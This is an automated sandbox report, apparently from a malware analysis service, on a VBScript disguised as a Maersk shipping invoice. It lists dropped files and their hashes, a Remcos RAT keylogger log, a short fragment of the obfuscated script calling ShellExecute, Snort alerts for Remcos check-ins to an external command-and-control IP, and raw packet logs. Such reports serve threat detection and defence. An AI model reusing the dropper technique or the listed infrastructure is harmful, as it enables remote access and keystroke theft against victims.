C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.137989037915285
Encrypted:	false
SSDEEP:	6:kKLT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ODnLNkPlE99SNxAhUe/3
MD5:	D27318E26393322A4106712C7D17C36A
SHA1:	A8E11B608EE98AC054D1DF228CBFF60E4FD56FAA
SHA-256:	954BEADA3A026890EA23AE61B65118701FDA885591623D4542640007BF10CB7A
SHA-512:	1857040922D0795E7671A1ABD19A66C5AB5A061A72B9D0E5CCF33E3E84D44F738B88ED5C221BC5D7EE7396134EB9C78763025DF2B6270DD6761312958C8B03E3
Malicious:	false
Reputation:	low
Preview:	p...... ..........@C...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	11608
Entropy (8bit):	4.8908305915084105
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
MD5:	DD89E182EEC1B964E2EEFE5F8889DCD7
SHA1:	326A3754A1334C32056811411E0C5C96F8BFBBEE
SHA-256:	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
SHA-512:	B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h45yca3z.n0i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_it3jblhk.1tt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgmxergi.2iy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywes52nc.utm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Scabrosely.Tor

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	467780
Entropy (8bit):	5.977268967161929
Encrypted:	false
SSDEEP:	6144:XK8AJTv+6pgy+Ur7NVQ8k7EdmcDB4jOZ/RXqxmhezwMy+Rvo9Td9H+Et+P:XK8AthnVxBuEdm24kZJhezwMoBdcP
MD5:	EB7223B18EB13FE6DF85647AE9D12722
SHA1:	A406984BD7E5CE4214402F0B8D8B4731976EE47A
SHA-256:	C3D1F59479601B37115C2C73552D208EDA7F5DE0817C57713025E20B2FBC1EF4
SHA-512:	AB23F8E3EADFD5E7E55AA614F63D40A91F51C7FE799516E986CE2AA269007085D873CD6ED730054E9EA1C395A2952BA9A340D85F816C1E97F8FE56DA4571CC97
Malicious:	false
Preview:	2f6b2+LrQbNWDTTW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbWD4GxAAAAZg909GYP3fXrXNmrqCV/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/m2YPZsPZ6utCqawHBkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBZg/90A9x9r3rUOeLXH/x8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx6cMAAAAPY8XZ6OtXxrGXQLm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5DUhmD/nmZg/Yw+tZZ+WEWLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTZ+d7h60psNJ4Zg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg4ODg5vb4g/95etA4cnoTYSEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhISEhLteKBMA2MrdwetJcZENJ1lZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZWVlZ

C:\Users\user\AppData\Roaming\kpburtts.dat

Download File

Process:	C:\Program Files (x86)\Windows Mail\wab.exe
File Type:	data
Category:	dropped
Size (bytes):	336
Entropy (8bit):	3.3284645172920007
Encrypted:	false
SSDEEP:	6:6lVZ5YcIeeDAlMlVvbWAAe5UlVJNQlR1SlV7nAbWAv:6lVBecmlVvbWFe5UlVJNQclV7AbW+
MD5:	ED0DDD4DD6F81CC3F75B590A9250310C
SHA1:	C34DB1266FD24EAB94061280E2D36F90BBDCE88E
SHA-256:	C8631C250182AE9042B438DCBC3632D112C3B83F49E13BC09A38ADD80A3B8C6B
SHA-512:	58CE528836E9FBE6FF80B82157FDBBB470B08F36DD6FD5A7FCDFBC3BBE70DCB24B49203B9F39683E1555E0B29C56FD6687D5033B00F55D26E7FEAD09AA8AEDAE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\kpburtts.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.0.7./.0.2. .0.1.:.4.8.:.0.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.7./.0.2. .0.1.:.4.8.:.0.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.7./.0.2. .0.1.:.4.8.:.0.3. .R.u.n.].........[.2.0.2.4./.0.7./.0.2. .0.1.:.4.8.:.0.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Static File Info

General

File type:	ASCII text, with very long lines (2004), with CRLF line terminators
Entropy (8bit):	5.621066672846715
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	Maersk_BL_Invoice_Packinglist.vbs
File size:	27'218 bytes
MD5:	43fe0e9069047cb153a3e86508d5a6ca
SHA1:	bb5431130b0b3441b9eda1e54bad3f56eb49f04c
SHA256:	bcd66ce1c9d8d1123249ef8240a6e7ef32662aaa897845e866627ee69b28dff1
SHA512:	6816a9e7626d87afe7211780e6d3312e21400c165f4160149ad57bab61c504458fe133adf8d6467724fa2b148c2d762e4203b4b6d2e0630ad2f109c460827571
SSDEEP:	384:HlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww779O7LWJRMv:FzSR022X/523S0e8xPPmE9VIFj3W+N
TLSH:	10C23CE08E0631148B473EE39C5905B18AB550E646112471A9FC37FC6A82F5CF7FDDAA
File Content Preview:	Function Spiritfulness....Call Monaxial.ShellExecute("P" & Piskefldens, Guidernes96, "", "", Preconsultor187)....End Function ....Spetrevlemundstetiser = String(236,"M") ....Rvertogterne = 61512..Supranaturalistic = &H617B..decreers = -54055..dermophobe =

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-07:48:47.077363	TCP	2032776	ET TROJAN Remcos 3.x Unencrypted Checkin	49742	3980	192.168.2.4	206.123.148.198
07/02/24-07:48:03.172003	TCP	2032776	ET TROJAN Remcos 3.x Unencrypted Checkin	49740	3980	192.168.2.4	206.123.148.198

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 07:47:04.691306114 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:04.691354990 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:04.691431046 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:04.698837996 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:04.698848009 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.255412102 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.255486965 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.262540102 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.262551069 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.262938023 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.276251078 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.316505909 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.401391029 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.401413918 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.401748896 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.401762009 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.420774937 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.420974016 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.420981884 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.475722075 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.496098042 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.496108055 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.496213913 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.497037888 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.497045040 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.497104883 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.498209953 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.498217106 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.498271942 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.516397953 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.516408920 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.516562939 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.590190887 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.590200901 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.590337992 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.591008902 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.591015100 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.591188908 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.591633081 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.591898918 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.592492104 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.592612028 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.593396902 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.593523979 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.594188929 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.594305992 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.610755920 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.610882044 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.611283064 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.611397982 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.684670925 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.684827089 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.685240030 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.685549974 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.686105967 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.686233044 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.687084913 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.687210083 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.687927008 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.688049078 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.688580036 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.688699007 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.689450026 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.689757109 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.690423965 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.690556049 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.691175938 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.691298962 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.691386938 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.691477060 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.705317020 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.705507040 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.706207991 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.706326962 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.707138062 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.707319021 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.707910061 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.708162069 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.779299974 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.779449940 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.779926062 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.780049086 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.780738115 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.780868053 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.781712055 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.781788111 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.782458067 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.782516003 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.783404112 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.783569098 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.784296036 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.784427881 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.785201073 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.785311937 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.786151886 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.786396027 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.786883116 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.787030935 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.787729025 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.787832022 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.799644947 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.799752951 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.800395012 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.800525904 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.800965071 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.801094055 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.801732063 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.801795006 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.802655935 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.802772999 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.873466969 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.873667955 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.874191999 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.874329090 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.874838114 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.874959946 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.875736952 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.875853062 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.876740932 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.876847982 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.877480030 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.877619028 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.878434896 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.878524065 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.878570080 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.878704071 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.879574060 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.879733086 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.880505085 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.880836964 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.881175995 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.881340027 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.893944025 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.894020081 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.894617081 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.894689083 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.895701885 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.895745039 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.895778894 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.895790100 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.895808935 CEST	443	49731	192.185.112.252	192.168.2.4
Jul 2, 2024 07:47:05.895823002 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.895987034 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:05.898500919 CEST	49731	443	192.168.2.4	192.185.112.252
Jul 2, 2024 07:47:55.622565031 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:55.627552032 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:55.628074884 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:55.628334999 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:55.633181095 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.589148998 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.589178085 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.589215994 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.589219093 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.589246035 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.589253902 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.589396954 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.589412928 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.589427948 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.589456081 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.589484930 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.834608078 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.834636927 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.834655046 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.834677935 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.834723949 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.834786892 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.834805012 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.834830046 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.834845066 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.835072994 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.835088968 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.835105896 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.835125923 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.835138083 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.835154057 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.835534096 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.835550070 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:56.835583925 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:56.835596085 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.078536987 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.078586102 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.078598022 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.078618050 CEST	80	49738	103.195.237.43	192.168.2.4
